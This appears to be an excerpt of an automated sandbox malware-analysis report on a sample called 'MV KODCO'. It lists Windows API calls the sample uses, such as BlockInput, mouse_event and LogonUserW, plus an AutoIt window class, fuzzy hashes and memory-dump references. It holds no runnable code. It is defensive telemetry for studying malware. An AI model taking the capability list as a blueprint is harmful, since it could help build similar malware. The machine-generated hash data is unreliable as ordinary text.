                                                          • Instruction Fuzzy Hash: 34E0E671004511AFE7252F54ED09DB77BEAEF443207148429F55981870D7625C90DB50
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00606DB3,-0000031A,?,?,00000001), ref: 006081B1
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 006081BA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: c9f178a1343f1ab2714f6b2e2bdb9fb2ec3303ea912330d8deb8cd4615c07226
                                                          • Instruction ID: da5f1d638a791a49686b4cfc943456b92678a1b678d24cb7fb5d9dded006417d
                                                          • Opcode Fuzzy Hash: c9f178a1343f1ab2714f6b2e2bdb9fb2ec3303ea912330d8deb8cd4615c07226
                                                          • Instruction Fuzzy Hash: 43B09231644608FBDB002BA2EC09B587F6AEB0A652F005010F60D942618BB264108A96
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: j
                                                          • API String ID: 3964851224-3704764536
                                                          • Opcode ID: 6d06eefc1e35827ac2f25f805e32fe2580127df8c3e29427ca7a891877f07894
                                                          • Instruction ID: e324415dee8860c13f4b4754bda1fe736e5be21ff6a46e58691872b24fb66bc5
                                                          • Opcode Fuzzy Hash: 6d06eefc1e35827ac2f25f805e32fe2580127df8c3e29427ca7a891877f07894
                                                          • Instruction Fuzzy Hash: 78926C70608345DFE724DF18C494B6ABBE1BF88304F14885DEA8A8B392D779ED45CB52
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 41174ec9ddeaddab610be162f50d9b365e9826d4f2015a1c011844c66bf6cc92
                                                          • Instruction ID: 58056309725079bdd534459f201d93f65cc41eadbd8574f9041a539935435233
                                                          • Opcode Fuzzy Hash: 41174ec9ddeaddab610be162f50d9b365e9826d4f2015a1c011844c66bf6cc92
                                                          • Instruction Fuzzy Hash: 22322521D69F014DD72B9634C932336A28EEFB73D5F15E727E819B5AA6EB29C4C34100
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: __itow__swprintf
                                                          • String ID:
                                                          • API String ID: 674341424-0
                                                          • Opcode ID: 394668a8e285bfae7c461b79bb8745aababea4024387977ef5789a9b058104b0
                                                          • Instruction ID: 105d19aede95b304fe989eb89d01e84905fac29efc533cd2a0e33b57fdfd9669
                                                          • Opcode Fuzzy Hash: 394668a8e285bfae7c461b79bb8745aababea4024387977ef5789a9b058104b0
                                                          • Instruction Fuzzy Hash: 752299715083819FD728DF15C894BABBBE5BF84310F10492DF9DA97291DB71E944CB82
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8c481ea951b3abb91243e3b31aba5aa228c471cabb3afe52b740fd673327305a
                                                          • Instruction ID: e23fb99e3222b764c9dc942d5406212811cf478ec913fddb21897f58c3ba1971
                                                          • Opcode Fuzzy Hash: 8c481ea951b3abb91243e3b31aba5aa228c471cabb3afe52b740fd673327305a
                                                          • Instruction Fuzzy Hash: 24B1DE20D2AF414DD72396398831336B69DAFBB2D5B91E71BFC2B74D62EB6185C34180
                                                          APIs
                                                          • __time64.LIBCMT ref: 0062B6DF
                                                            • Part of subcall function 0060344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0062BDC3,00000000,?,?,?,?,0062BF70,00000000,?), ref: 00603453
                                                            • Part of subcall function 0060344A: __aulldiv.LIBCMT ref: 00603473
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Time$FileSystem__aulldiv__time64
                                                          • String ID:
                                                          • API String ID: 2893107130-0
                                                          • Opcode ID: c3b709504ae04a9de1942ae9f7d6e61589993fb4c781c5c7a44d777939403325
                                                          • Instruction ID: e47dff4c73651a1f46db6525e3f4a67f7141494f619cf1c8b531ae74d8dd7354
                                                          • Opcode Fuzzy Hash: c3b709504ae04a9de1942ae9f7d6e61589993fb4c781c5c7a44d777939403325
                                                          • Instruction Fuzzy Hash: 342172726345208BCB29CF28D881A92F7E6EB95310B249E6DE4E5CF2C0CB74B905DF54
                                                          APIs
                                                          • BlockInput.USER32(00000001), ref: 00636ACA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: BlockInput
                                                          • String ID:
                                                          • API String ID: 3456056419-0
                                                          • Opcode ID: e315988acea69940d2ed9b951f867ce96b015acd6f8da72054f7525ed95b3d19
                                                          • Instruction ID: 00f3eafa470d24da7aa1291a271e37551be017c9f675e4f62d84b2cd7cf24d30
                                                          • Opcode Fuzzy Hash: e315988acea69940d2ed9b951f867ce96b015acd6f8da72054f7525ed95b3d19
                                                          • Instruction Fuzzy Hash: 0BE012356002056FC700EB59D404996BBEDAFA8751F04C456FA46D7291DAB0E8048BA0
                                                          APIs
                                                          • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0062750A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: mouse_event
                                                          • String ID:
                                                          • API String ID: 2434400541-0
                                                          • Opcode ID: ea2cc5f0dbd0806a160f50352d53b69cae18075c7c325a235816ce67bab3e210
                                                          • Instruction ID: fde0c294698bf8b65581c811828ca23071b966dbff6f2269e030f3e4c0b78ba6
                                                          • Opcode Fuzzy Hash: ea2cc5f0dbd0806a160f50352d53b69cae18075c7c325a235816ce67bab3e210
                                                          • Instruction Fuzzy Hash: E1D09EA416CE2579ED191724BC1BFF7554BF304785FD45549BA03E91C0ACD45D02A835
                                                          APIs
                                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0061AD3E), ref: 0061B124
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: LogonUser
                                                          • String ID:
                                                          • API String ID: 1244722697-0
                                                          • Opcode ID: 758f1d90e6c1c53ad6f01cc972be4068c90891c8a7ed3f36ae8d570525ffffb2
                                                          • Instruction ID: 347e86fed306e559e0a46c6a62a7d13c40f28a991f9c19327a081d1a560afd06
                                                          • Opcode Fuzzy Hash: 758f1d90e6c1c53ad6f01cc972be4068c90891c8a7ed3f36ae8d570525ffffb2
                                                          • Instruction Fuzzy Hash: 64D05E321A464EAEDF024FA4DC02EAE3F6AEB04700F408110FA11C50A0C671D531AB50
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          • Opcode ID: 3dc628da3de12dcd24b47255cc9a105bc193645f98c7a423fe8c7b5f2e7d2bdf
                                                          • Instruction ID: da9adefe7e7ea620bd5e0cd53538b7802f416839fb5744c25713c9dfc624442e
                                                          • Opcode Fuzzy Hash: 3dc628da3de12dcd24b47255cc9a105bc193645f98c7a423fe8c7b5f2e7d2bdf
                                                          • Instruction Fuzzy Hash: 0BC04CB1800109DFC751CFC0CD449EEB7BDAB04305F105191D105F1110D7709B459B72
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0060818F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 2310a5f3b5c5fefe574a6ef14cf95549195093884c69d5b4bf0db4e747ffb9a8
                                                          • Instruction ID: 7dd4fa99634d160b415d54b149087fb522a6d0136e072b41f598c1714578c01e
                                                          • Opcode Fuzzy Hash: 2310a5f3b5c5fefe574a6ef14cf95549195093884c69d5b4bf0db4e747ffb9a8
                                                          • Instruction Fuzzy Hash: 43A0223000020CFBCF002F83FC088883F2EFB022A0B000020F80C80230CBB3A8208AC2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 24e5ec03c965ab706e86e3e821e098a674f293e7cac0617a8b4cdcccd30e77fc
                                                          • Instruction ID: 3ccd00b20634fd0059555a2da1327faf50a977fcf3dc9f10f0c0729931b0722b
                                                          • Opcode Fuzzy Hash: 24e5ec03c965ab706e86e3e821e098a674f293e7cac0617a8b4cdcccd30e77fc
                                                          • Instruction Fuzzy Hash: 8B22127091025ACFCB28DF59D486ABEBBF1FF08300F148469E98A9B351E335AD45CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0007cb3292ea3d754cc4a9ee6384ffbc5b03dc0c80c57c6b3a884b71f41296ca
                                                          • Instruction ID: d2589eb24457f6ac6bf87072747f2cb6d13180a52451d7ea057f10e688a29bde
                                                          • Opcode Fuzzy Hash: 0007cb3292ea3d754cc4a9ee6384ffbc5b03dc0c80c57c6b3a884b71f41296ca
                                                          • Instruction Fuzzy Hash: 11128F70A0024ADFDF08DFA5D995AEEBBF6FF48300F104569E846E7290EB35A915CB50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throwstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 3728558374-0
                                                          • Opcode ID: c03c5412b30a427d1666bcd3ba4f0ea340d7029e9cb08bfee842ba947d79d932
                                                          • Instruction ID: 3ef72caa510ff9376372bf492d2e58bd248aa3d8245cfa575414583aacef9966
                                                          • Opcode Fuzzy Hash: c03c5412b30a427d1666bcd3ba4f0ea340d7029e9cb08bfee842ba947d79d932
                                                          • Instruction Fuzzy Hash: C202F370A0010ADBDF08DF65D895AAFBBB6FF44300F108469E846DB295EB35DA15CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                          • Instruction ID: b00736c32e9d17d3e2c611da24ee4d79c18eac06c01fd2424a4a0094fc9b1da0
                                                          • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                          • Instruction Fuzzy Hash: F6C114322450970AEF6D4639843057FBEA26EA27B171A076DD8B3CB5D1EF24C534D720
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                          • Instruction ID: 0a12d2b17f4bdfc8745ba84a5748a9e23c59451df58125b44c4836de9c806f3c
                                                          • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                          • Instruction Fuzzy Hash: EEC1F1322451930AEF6D4639843467FBEA26EA2BB170A176DD4B3CB5D2EF24C534C720
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                          • Instruction ID: 64f0b883aaa758dcf101911b209f660d0f61e800d984ee06ba87e29ddc94f0a1
                                                          • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                          • Instruction Fuzzy Hash: 32C1E2322051970AEF6D4639843457FBEA66EA27B171A03ADD5B3CB9D1EF24C534C720
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                          • Instruction ID: 23676780e973bfa1903ed1c9dfbb751cfc53934976355c1f4782bca014d7d87b
                                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                          • Instruction Fuzzy Hash: 50C1903220909B09DB6D4639847443EBFA56EA2BB131A077DD6B2CB9D5EE28C534D720
                                                          APIs
                                                          • DeleteObject.GDI32(00000000), ref: 0063A2FE
                                                          • DeleteObject.GDI32(00000000), ref: 0063A310
                                                          • DestroyWindow.USER32 ref: 0063A31E
                                                          • GetDesktopWindow.USER32 ref: 0063A338
                                                          • GetWindowRect.USER32(00000000), ref: 0063A33F
                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0063A480
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0063A490
                                                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0063A4D8
                                                          • GetClientRect.USER32(00000000,?), ref: 0063A4E4
                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0063A51E
                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0063A540
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0063A553
                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0063A55E
                                                          • GlobalLock.KERNEL32(00000000), ref: 0063A567
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0063A576
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0063A57F
                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0063A586
                                                          • GlobalFree.KERNEL32(00000000), ref: 0063A591
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0063A5A3
                                                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0066D9BC,00000000), ref: 0063A5B9
                                                          • GlobalFree.KERNEL32(00000000), ref: 0063A5C9
                                                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0063A5EF
                                                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0063A60E
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0063A630
                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0063A81D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
